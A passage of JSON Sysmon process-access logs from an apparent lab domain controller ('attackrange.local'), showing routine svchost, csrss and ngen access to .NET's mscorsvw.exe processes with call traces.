C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:17.075","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-133D-5F25-0000-001097E70C00}","TargetProcessId":"3284","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7877,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:17.122\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-133D-5F25-0000-00107DEB0C00}\r\nTargetProcessId: 4988\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:17.122","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-133D-5F25-0000-00107DEB0C00}","TargetProcessId":"4988","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7878,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:17.122\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-133D-5F25-0000-00107DEB0C00}\r\nTargetProcessId: 4988\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:17.122","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-133D-5F25-0000-00107DEB0C00}","TargetProcessId":"4988","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7879,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:17.122\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-133D-5F25-0000-00107DEB0C00}\r\nTargetProcessId: 4988\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:17.122","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-133D-5F25-0000-00107DEB0C00}","TargetProcessId":"4988","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7880,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:17.169\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-133D-5F25-0000-00103FEF0C00}\r\nTargetProcessId: 3476\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:17.169","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-133D-5F25-0000-00103FEF0C00}","TargetProcessId":"3476","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7881,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:17.169\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-133D-5F25-0000-00103FEF0C00}\r\nTargetProcessId: 3476\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:17.169","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-133D-5F25-0000-00103FEF0C00}","TargetProcessId":"3476","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7882,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:17.169\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-133D-5F25-0000-00103FEF0C00}\r\nTargetProcessId: 3476\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:17.169","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-133D-5F25-0000-00103FEF0C00}","TargetProcessId":"3476","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7883,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:17.200\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-131F-5F25-0000-001060D00A00}\r\nTargetProcessId: 4804\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:17.200","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-131F-5F25-0000-001060D00A00}","TargetProcessId":"4804","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\F